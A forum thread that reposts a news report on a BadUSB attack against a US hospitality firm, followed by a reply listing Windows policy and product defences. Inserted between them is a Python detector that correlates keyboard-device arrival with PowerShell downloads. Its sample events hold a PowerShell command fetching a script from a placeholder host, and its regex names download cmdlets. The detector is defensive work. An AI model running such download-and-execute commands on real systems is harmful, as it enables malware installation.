Rare BadUSB attack detected in the wild against US hospitality provider

silversurfer

Hackers use snail-mail to send target company an envelope with a malware-laced USB thumb drive.

A US hospitality provider has recently been the target of an incredibly rare BadUSB attack, ZDNet has learned from cyber-security firm Trustwave.

The attack happened after the company received an envelope containing a fake BestBuy gift card, along with a USB thumb drive.

The receiving company was told to plug the USB thumb drive into a computer to access a list of items the gift card could be used for.

But in reality, the USB thumb drive was what security experts call a "BadUSB" -- a USB thumb drive that actually functions as a keyboard when connected to a computer, where it emulates keypresses to launch various automated attacks.

Trustwave, who couldn't reveal the target company's name for confidentiality reasons, said the victim recognized the attempted hack and called it in to investigate the incident.

In a report published today and shared with ZDNet, Trustwave said that once they plugged the BadUSB into a test workstation, the BadUSB triggered a series of automated keypresses that launched a PowerShell command. This PowerShell command downloaded a bulkier PowerShell script from an internet site and then installed malware on the test machine -- a JScript-based bot.
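The chain described in the quoted report (a USB device that shows up as a keyboard, followed by a PowerShell command that downloads a script) can be hunted by correlating the two events in time. This is an added example, not part of the thread or of Trustwave's report; the event schema, host names, 30-second window and sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed, normalized events (hypothetical schema, not a real log format).
# In practice these would come from device-arrival and process-creation telemetry.
EVENTS = [
    {"ts": "2024-01-01T10:00:00", "kind": "device_arrival", "host": "ws1",
     "device_class": "Keyboard"},
    {"ts": "2024-01-01T10:00:04", "kind": "process_start", "host": "ws1",
     "image": "powershell.exe",
     "cmdline": "powershell Invoke-WebRequest http://example.invalid/stage.ps1"},
    {"ts": "2024-01-01T11:30:00", "kind": "device_arrival", "host": "ws2",
     "device_class": "DiskDrive"},
    {"ts": "2024-01-01T11:30:05", "kind": "process_start", "host": "ws2",
     "image": "powershell.exe", "cmdline": "powershell Get-ChildItem E:\\"},
    {"ts": "2024-01-01T12:00:00", "kind": "device_arrival", "host": "ws3",
     "device_class": "Keyboard"},
    {"ts": "2024-01-01T12:20:00", "kind": "process_start", "host": "ws3",
     "image": "powershell.exe",
     "cmdline": "powershell Invoke-WebRequest http://example.invalid/stage.ps1"},
]

# Command-line fragments that indicate PowerShell is fetching remote content.
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}

def find_hid_injection(events, window=timedelta(seconds=30)):
    """Flag PowerShell downloads that start right after a new keyboard appears."""
    last_kbd = {}  # host -> time of the most recent keyboard-class arrival
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["kind"] == "device_arrival" and ev["device_class"] == "Keyboard":
            last_kbd[ev["host"]] = ts
        elif ev["kind"] == "process_start" and ev["image"].lower() in SHELLS:
            seen = last_kbd.get(ev["host"])
            if seen and ts - seen <= window and DOWNLOAD.search(ev["cmdline"]):
                hits.append((ev["host"], (ts - seen).total_seconds(), ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for host, delay, cmd in find_hid_injection(EVENTS):
        print(f"{host}: download command {delay:.0f}s after keyboard arrival: {cmd}")
```

Only ws1 is flagged: ws2 attached a storage device, and on ws3 the same command ran 20 minutes after the keyboard appeared, outside the correlation window.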
 

HarborFront

You can prevent BadUSB in Win10 Pro by editing in Local Group Policy Editor following the steps below


Alternatively, HMPA also has a feature to prevent BadUSB. Similarly, using G-DATA's USB Keyboard Guard from below

 
